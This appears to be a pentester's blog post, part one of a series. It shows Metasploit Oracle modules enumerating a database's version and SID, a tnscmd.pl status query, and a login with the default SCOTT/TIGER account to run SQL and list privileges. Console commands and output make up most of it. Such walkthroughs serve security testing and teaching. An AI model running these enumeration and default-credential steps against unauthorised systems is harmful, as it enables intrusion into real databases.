Oracle Pwnage with the Metasploit Oracle Modules Part 1
Posted by CG
Every so often you come across an open 1521 on a pentest.
1521/tcp open oracle
But what to do? There aren’t a ton of what I consider usable Oracle exploits out there, and the ones that are there involve installing a bunch of extra libraries, and we know thats “tough” to do. Thankfully MC has done all the work for us and created the metasploit mixin and modules. **Need help getting the mixin installed? See my file format post.
All the fun is available here: http://metasploit.com/users/mc/
We start with Oracle version enumeration:
http://metasploit.com/users/mc/oracle9i/oracle_version.rb
msf > use auxiliary/scanner/oracle/oracle_version
msf auxiliary(oracle_version) > info
Name: Oracle Version Enumeration
Version: $Revision$
Provided by:
MC
Basic options:
Name Current Setting Required Description
—- ————— ——– ———–
RHOSTS yes The target address range or CIDR identifier
RPORT 1521 yes The target port
THREADS 1 yes The number of concurrent threads
Description:
This module simply queries the TNS listner for the Oracle build.
msf auxiliary(oracle_version) > set RHOSTS 192.168.100.25
RHOSTS => 192.168.100.25
msf auxiliary(oracle_version) > run
[*] Host 192.168.100.25 is running: 32-bit Windows: Version 9.2.0.1.0 – Production
Next step is to determine the SID that the Oracle instance is running as:
http://metasploit.com/users/mc/oracle9i/oracle_sid.rb
msf > use auxiliary/scanner/oracle/oracle_sid
msf auxiliary(oracle_sid) > info
Name: Oracle SID Enumeration
Version: $Revision$
Provided by:
MC
Basic options:
Name Current Setting Required Description
—- ————— ——– ———–
RHOSTS yes The target address range or CIDR identifier
RPORT 1521 yes The target port
THREADS 1 yes The number of concurrent threads
Description:
This module simply queries the TNS listner for the SID.
msf auxiliary(oracle_sid) > set RHOSTS 192.168.100.25
RHOSTS => 192.168.100.25
msf auxiliary(oracle_sid) > run
[*] Identified SID for 192.168.100.25: UNLUCKYDB
[*] Auxiliary module execution completed
msf auxiliary(oracle_sid) >
Next we use the oracle_sql module to execute SQL queries against the database. This is handy to 1) run SQL queries and 2) check privileges if you’ve managed to find some working passwords (hint):
http://metasploit.com/users/mc/oracle9i/oracle_sql.rb
msf > use auxiliary/admin/oracle/oracle_sql
msf auxiliary(oracle_sql) > info
Name: Run simple SQL against the Oracle instance
Version: $Revision:$
Provided by:
MC
Basic options:
Name Current Setting Required Description
—- ————— ——– ———–
DBPASS TIGER yes The password to authenticate as.
DBUSER SCOTT yes The username to authenticate as.
RHOST 127.0.0.1 yes The Oracle host.
RPORT 1521 yes The TNS port.
SID DEMO yes The sid to authenticate with.
SQL select * from v$version no The SQL to execute.
Description:
This module will allow for simple sql statements to be execute
against a given oracle instance given the appropriate credentials.
msf auxiliary(oracle_sql) > set RHOST 192.168.100.25
RHOST => 192.168.100.25
msf auxiliary(oracle_sql) > set SID UNLUCKYDB
SID => UNLUCKYDB
msf auxiliary(oracle_sql) > run
[-] ORA-12514: TNS:listener does not currently know of service requested in connect descriptor
[*] Sending SQL…
[-] ORA-12514: TNS:listener does not currently know of service requested in connect descriptor
[-] undefined method `prepare’ for #
[-] undefined method `each’ for nil:NilClass
[*] Done…
[-] Auxiliary failed: NoMethodError undefined method `disconnect’ for #
[-] Call stack:
[-] (eval):48:in `run’
[*] Auxiliary module execution completed
WTF! no FTW on that one. A Google of the error oracle 12514, hints at the Oracle instance not being set up correctly. Lets see if we can get some more info. Using tnscmd.pl (oldie but a goodie) lets see if we get some additional information using the status command:
cg@WPAD:~/evil/db/oracle$ perl tnscmd.pl status -h 192.168.100.25
sending (CONNECT_DATA=(COMMAND=status)) to 192.168.100.25:1521
writing 89 bytes
reading
. …….6………S. ………..]……..(DESCRIPTION=(TMP=)(VSNNUM=153092352)(ERR=0)(ALIAS=LISTENER)
(SECURITY=OFF)(VERSION=TNSLSNR for 32-bit Windows: Version 9.2.0.1.0 – Production)(START_DATE=13-11TB-200809:50:24)(SIDNUM=1)(LOGFILE=e:\oracle\ora92\network\log\listener.log)
(PRMFILE=e:\oracle\ora92\network\admin\listener.ora)(TRACING=off)(UPTIME=32233167)(SNMP=OFF)(PID=1580))
.5……..(ENDPOINT=(HANDLER=(HANDLER_MAXLOAD=0)(HANDLER_LOAD=0)(ESTABLISHED=0)(REFUSED=0)
(HANDLER_ID=05ABD43D6CF4-438B-A1A1-14FC7801D431)(PRE=any)(SESSION=NS)(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)
(HOST=ab1.xxxxx.com)(PORT=1521))))),,(ENDPOINT=(HANDLER=(STA=ready)(HANDLER_MAXLOAD=0)(HANDLER_LOAD=0)
(ESTABLISHED=0)(REFUSED=0)(HANDLER_ID=A06894A90C64-4555-A915-FC8798AA2A9B)(PRE=http)(SESSION=RAW)
(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=ab1.xxxxxx.com)(PORT=8080))(Presentation=HTTP)(Session=RAW)))),,
(ENDPOINT=(HANDLER=(STA=ready)(HANDLER_MAXLOAD=0)(HANDLER_LOAD=0)(ESTABLISHED=0)(REFUSED=0)
(HANDLER_ID=A0BB13DB2389-431A-80F2-D896C275A179)(PRE=FTP)(SESSION=RAW)(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)
(HOST=ab1.xxxxxx.com)(PORT=2100))(Presentation=FTP)(Session=RAW)))),,(SERVICE=(SERVICE_NAME=UNLUCKYDB.MYPWN)
(INSTANCE=(INSTANCE_NAME=UNLUCKYDB)(NUM=2)(NUMREL=1))),,(SERVICE=(SERVICE_NAME=UNLUCKYXDB.MYPWN)
(INSTANCE=(INSTANCE_NAME=UNLUCKYDB)(NUM=2)(NUMREL=1))),,………@
Let’s try it with the service name; UNLUCKYXDB.MYPWN
msf auxiliary(oracle_sql) > set SID UNLUCKYXDB.MYPWN
SID => UNLUCKYXDB.MYPWN
msf auxiliary(oracle_sql) > run
[*] Sending SQL…
[*] Oracle9i Enterprise Edition Release 9.2.0.1.0 – Production
[*] PL/SQL Release 9.2.0.1.0 – Production
[*] CORE 9.2.0.1.0 Production
[*] TNS for 32-bit Windows: Version 9.2.0.1.0 – Production
[*] NLSRTL Version 9.2.0.1.0 – Production
[*] Done…
[*] Auxiliary module execution completed
msf auxiliary(oracle_sql) >
**Yeah it worked. Now its time to get some more useful info
msf auxiliary(oracle_sql) > set SQL “select * from user_role_privs”
SQL => select * from user_role_privs
msf auxiliary(oracle_sql) > run
[*] Sending SQL…
[*] SCOTT,CONNECT,NO,YES,NO
[*] SCOTT,RESOURCE,NO,YES,NO
[*] Done…
[*] Auxiliary module execution completed
Thats it for part 1, part 2 we’ll use some sqli to hopefully bump scott up to DBA and execute some OS commands.